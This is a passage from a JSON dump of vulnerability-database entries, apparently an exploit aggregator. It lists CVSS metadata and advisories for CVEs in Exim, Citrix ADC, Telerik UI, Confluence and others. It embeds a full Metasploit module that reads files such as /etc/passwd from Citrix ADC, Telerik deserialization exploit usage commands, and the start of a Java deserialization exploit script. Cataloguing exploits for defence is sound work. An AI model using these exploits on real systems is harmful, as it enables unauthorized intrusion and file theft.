"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2022-07-22T10:51:21", "id": "7DB4D6C1-099F-581F-8C39-DB454925C570", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:19:34", "description": "# StickyExim\n![](https://bretstaton.com/images/article_images/ex...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-07-25T00:46:37", "type": "githubexploit", "title": "Exploit for OS Command Injection in Exim", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2021-12-05T21:57:04", "id": "7B7215E0-65A8-5ECC-B222-5204D0DE0ABF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:21:18", "description": "# CVE-2019-10149 - Exim 4.87 < 4.91\nInstructions for installing ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-21T08:13:27", "type": "githubexploit", "title": "Exploit for OS Command Injection in Exim", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2021-12-05T21:57:04", "id": "314FBFEA-2B26-54C6-BD8B-833438155879", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-05T10:17:26", "description": "# CVE-2019-3396\n### Confluence \u672a\u6388\u6743 RCE (CVE-2019-3396) \u6f0f\u6d1e\n\n#### ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-10T02:22:24", "type": "githubexploit", "title": "Exploit for Path Traversal in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-3396"], "modified": "2022-08-05T08:34:58", "id": "6B67D619-5DD1-507C-9028-561DC01DC062", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:38:28", "description": "An authentication bypass vulnerability exists in Citrix ADC and Citrix gateway. Successful exploitation of this vulnerability could allow a remote attacker to gain unauthorized access to the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 2.5}, "published": "2020-08-03T00:00:00", "type": "checkpoint_advisories", "title": "Citrix ADC Authentication Bypass (CVE-2020-8193; CVE-2020-8195; CVE-2020-8196)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196"], "modified": "2020-08-03T00:00:00", "id": "CPAI-2020-0712", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-04-19T18:31:26", "description": "A file upload vulnerability exists in Atlassian Crowd webserver. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-07-16T00:00:00", "type": "checkpoint_advisories", "title": "Atlassian Crowd Remote Code Execution (CVE-2019-11580)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2019-07-16T00:00:00", "id": "CPAI-2019-0860", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:26:39", "description": "An insecure deserialization vulnerability exists in the Flex integration service of Adobe ColdFusion. The vulnerability is due to the lack of input validation. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-07-29T00:00:00", "type": "checkpoint_advisories", "title": "Adobe ColdFusion DataServicesCFProxy Insecure Deserialization (CVE-2018-4939)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4939"], "modified": "2018-08-15T00:00:00", "id": "CPAI-2018-0772", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:12:16", "description": "A remote code execution vulnerability exists in Progress Telerik UI for Asp.Net Ajax. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-09T00:00:00", "type": "checkpoint_advisories", "title": "Progress Telerik UI Remote Code Execution (CVE-2019-18935)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2021-09-19T00:00:00", "id": "CPAI-2019-1914", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:45:10", "description": "A remote code execution vulnerability has been reported in the Apache Commons Java Collections Framework. A remote unauthenticated attacker may exploit this vulnerability by sending a crafted serialized object to an application which uses the Apache Commons Java Collections Framework as part of its code path, and thereby execute arbitrary code on the server running the application.", "cvss3": {}, "published": "2015-11-19T00:00:00", "type": "checkpoint_advisories", "title": "WebLogic Apache Commons Java Collections Library Remote Code Execution (CVE-2015-4852)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4852"], "modified": "2017-01-31T00:00:00", "id": "CPAI-2015-1321", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:39:40", "description": "A command injection vulnerability exists in Draytek Vigor. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-07T00:00:00", "type": "checkpoint_advisories", "title": "Draytek Vigor Command Injection (CVE-2020-8515)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8515"], "modified": "2020-05-27T00:00:00", "id": "CPAI-2020-0320", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:33:31", "description": "A command injection vulnerability exists in Symantec Messaging Gateway. The cause of the vulnerability due to combination of an authentication bypass in LoginAction and a lack of sanitization on user input.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-09-03T00:00:00", "type": "checkpoint_advisories", "title": "Symantec Messaging Gateway performRestore Command Injection (CVE-2017-6327)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6327"], "modified": "2017-09-06T00:00:00", "id": "CPAI-2017-0728", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:40:23", "description": "A remote code execution vulnerability exists in Zoho ManageEngine Desktop Central. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-08T00:00:00", "type": "checkpoint_advisories", "title": "Zoho ManageEngine Remote Code Execution (CVE-2020-10189)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-08T00:00:00", "id": "CPAI-2020-0118", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:23:00", "description": "A remote code execution vulnerability exists in Exim Mail Server. A remote attacker can exploit this issue by sending a specially crafted packet to the target server. Successful exploitation could result in execution of arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-06-12T00:00:00", "type": "checkpoint_advisories", "title": "Exim Mail Server Remote Code Execution (CVE-2019-10149)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-10-30T00:00:00", "id": "CPAI-2019-0743", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2021-12-02T09:21:05", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 2.5}, "published": "2020-11-14T00:00:00", "type": "zdt", "title": "Citrix ADC NetScaler Local File Inclusion Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8193"], "modified": "2020-11-14T00:00:00", "id": "1337DAY-ID-35228", "href": "https://0day.today/exploit/description/35228", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Citrix ADC NetScaler - Local File Inclusion (Metasploit)',\n 'Description' => %{\n The remote device is affected by multiple vulnerabilities.\n\n An authorization bypass vulnerability exists in Citrix ADC and NetScaler Gateway devices.\n An unauthenticated remote attacker with access to the `NSIP/management interface` can exploit\n this to bypass authorization (CVE-2020-8193).\n\n And Information disclosure (CVE-2020-8195 and CVE-2020-8196) - but at this time unclear which.\n },\n 'Author' => [\n 'Donny Maasland', # Discovery\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Module author (Zeop Entreprise)\n ],\n 'References' => [\n ['CVE', '2020-8193'],\n ['CVE', '2020-8195'],\n ['CVE', '2020-8196'],\n ['URL', 'https://dmaasland.github.io/posts/citrix.html'],\n ['URL', 'https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/amp/'],\n ['URL', 'https://github.com/jas502n/CVE-2020-8193']\n ],\n 'DisclosureDate' => '2020-07-09',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n }\n ))\n\n register_options([\n OptEnum.new('MODE', [true, 'Start type.', 'discovery', [ 'discovery', 'interactive', 'sessions']]),\n OptString.new('PATH', [false, 'File or directory you want to read', '/nsconfig/ns.conf']),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def create_session\n params = 'type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1'\n\n request = {\n 'method' => 'POST',\n 'uri' => \"#{normalize_uri(target_uri.path, 'pcidss', 'report')}?#{params}\",\n 'ctype' => 'application/xml',\n 'headers' => {\n 'X-NITRO-USER' => Rex::Text.rand_text_alpha(6..8),\n 'X-NITRO-PASS' => Rex::Text.rand_text_alpha(6..8)\n },\n 'data' => '<appfwprofile><login></login></appfwprofile>'\n }\n request = request.merge({'cookie' => @cookie}) if @cookie\n\n response = send_request_raw(request)\n unless response && response.code == 406\n print_error(\"#{@message_prefix} - No response to session request.\")\n return\n end\n\n response.get_cookies\n end\n\n def fix_session_rand\n response = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'menu', 'ss'),\n 'cookie' => @cookie,\n 'vars_get' => {\n 'sid' => 'nsroot',\n 'username' => 'nsroot',\n 'force_setup' => '1'\n }\n )\n\n if response && response.code == 302\n location = response.headers['location']\n\n response = send_request_cgi(\n 'method' => 'GET',\n 'uri' => location,\n 'cookie' => @cookie\n )\n\n return unless response && response.code == 200\n end\n\n response.to_s.scan(/rand = \"([^\"]+)\"/).join\n end\n\n def read_lfi(path, var_rand)\n params = \"filter=path:#{path}\"\n\n request = {\n 'method' => 'POST',\n 'uri' => \"#{normalize_uri(target_uri.path, 'rapi', 'filedownload')}?#{params}\",\n 'cookie' => @cookie,\n 'ctype' => 'application/xml',\n 'headers' => {\n 'X-NITRO-USER' => Rex::Text.rand_text_alpha(6..8),\n 'X-NITRO-PASS' => Rex::Text.rand_text_alpha(6..8),\n 'rand_key' => var_rand\n },\n 'data' => '<clipermission></clipermission>'\n }\n\n response = send_request_raw(request)\n end\n\n def run_host(ip)\n proto = (datastore['SSL'] ? 'https' : 'http')\n @message_prefix = \"#{proto}://#{ip}:#{datastore['RPORT']}\"\n\n @cookie = create_session\n if @cookie && @cookie =~ /SESSID/\n print_status(\"#{@message_prefix} - Got session: #{@cookie.split(' ')[0]}\")\n\n var_rand = fix_session_rand\n unless var_rand\n print_error(\"#{@message_prefix} - Unable to get rand value.\")\n return Exploit::CheckCode::Unknown\n end\n print_status(\"#{@message_prefix} - Got rand: #{var_rand}\")\n\n print_status(\"#{@message_prefix} - Re-breaking session...\")\n create_session\n\n case datastore['MODE']\n when /discovery/\n response = read_lfi('/etc/passwd'.gsub('/', '%2F'), var_rand)\n if response.code == 406\n if response.body.include? ('root:*:0:0:')\n print_warning(\"#{@message_prefix} - Vulnerable.\")\n\n return Exploit::CheckCode::Vulnerable\n end\n end\n when /interactive/\n # TODO: parse response\n response = read_lfi(datastore['PATH'].gsub('/', '%2F'), var_rand)\n if response.code == 406\n print_line(\"#{response.body}\")\n end\n\n return\n when /sessions/\n # TODO: parse response\n response = read_lfi('/var/nstmp'.gsub('/', '%2F'), var_rand)\n if response.code == 406\n print_line(\"#{response.body}\")\n end\n\n return\n end\n end\n print_good(\"#{@message_prefix} - Not Vulnerable.\")\n\n return Exploit::CheckCode::Safe\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/35228", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-12-19T01:04:29", "description": "Exploit for asp platform in category web applications", "cvss3": {}, "published": "2019-12-18T00:00:00", "type": "zdt", "title": "Telerik UI - Remote Code Execution via Insecure Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-18935"], "modified": "2019-12-18T00:00:00", "id": "1337DAY-ID-33683", "href": "https://0day.today/exploit/description/33683", "sourceData": "Telerik UI - Remote Code Execution via Insecure Deserialization Exploit\r\n\r\nSee the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions).\r\n\r\nInstall\r\ngit clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935\r\npython3 -m venv env\r\nsource env/bin/activate\r\npip3 install -r requirements.txt\r\n\r\nRequirements\r\nThis exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above.\r\n\r\nUsage\r\nCompile mixed mode assembly DLL payload\r\nIn a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization.\r\n\r\nbuild_dll.bat sleep.c\r\nUpload and load payload into application via insecure deserialization\r\nPass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit.\r\n\r\npython3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\\Windows\\Temp' -p sleep_2019121205271355_x86.dll\r\n[*] Local payload name: sleep_2019121205271355_x86.dll\r\n[*] Destination folder: C:\\Windows\\Temp\r\n[*] Remote payload name: 1576142987.918625.dll\r\n\r\n{'fileInfo': {'ContentLength': 75264,\r\n 'ContentType': 'application/octet-stream',\r\n 'DateJson': '1970-01-01T00:00:00.000Z',\r\n 'FileName': '1576142987.918625.dll',\r\n 'Index': 0},\r\n 'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '\r\n 'Telerik.Web.UI, Version=<VERSION>, '\r\n 'Culture=neutral, '\r\n 'PublicKeyToken=<TOKEN>',\r\n 'TempFileName': '1576142987.918625.dll'}}\r\n\r\n[*] Triggering deserialization...\r\n\r\n<title>Runtime Error</title>\r\n<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>\r\n<h2> <i>Runtime Error</i> </h2></span>\r\n...omitted for brevity...\r\n\r\n[*] Response time: 13.01 seconds\r\nIn the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000).\r\n\r\nThanks\r\n@mwulftange initially discovered this vulnerability. @bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object.\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47793.zip\n\n# 0day.today [2019-12-18] #", "sourceHref": "https://0day.today/exploit/33683", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-30T02:13:36", "description": "Exploit for multiple platform in category remote exploits", "cvss3": {}, "published": "2018-04-29T00:00:00", "type": "zdt", "title": "Websphere / JBoss / OpenNMS / Symantec - Java Deserialization Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-4852"], "modified": "2018-04-29T00:00:00", "id": "1337DAY-ID-30269", "href": "https://0day.today/exploit/description/30269", "sourceData": "#! /bin/bash/env python3\r\n#\r\n# ____ _ _ _ \r\n# / ___| ___ _ __(_) __ _| | __ _| |_ ___ _ __ \r\n# \\___ \\ / _ \\ '__| |/ _` | |/ _` | __/ _ \\| '__|\r\n# ___) | __/ | | | (_| | | (_| | || (_) | | \r\n# |____/ \\___|_| |_|\\__,_|_|\\__,_|\\__\\___/|_|\r\n#\r\n# By Nikhil Sreekumar (@roo7break)\r\n# Websphere/JBoss/OpenNMS/Symantec Endpoint Protection Manager - Java Deserialization Remote Code Execution\r\n \r\nimport sys\r\nimport base64\r\nimport httplib2\r\nimport socket\r\nimport argparse\r\nimport socket\r\nimport os\r\nimport struct\r\nimport ctypes\r\n \r\nversion = \"0.1\"\r\nbanner = \"\"\"\r\n ____ _ _ _ \r\n / ___| ___ _ __(_) __ _| | __ _| |_ ___ _ __ \r\n \\___ \\ / _ \\ '__| |/ _` | |/ _` | __/ _ \\| '__|\r\n ___) | __/ | | | (_| | | (_| | || (_) | | \r\n |____/ \\___|_| |_|\\__,_|_|\\__,_|\\__\\___/|_|\r\n by Nikhil Sreekumar 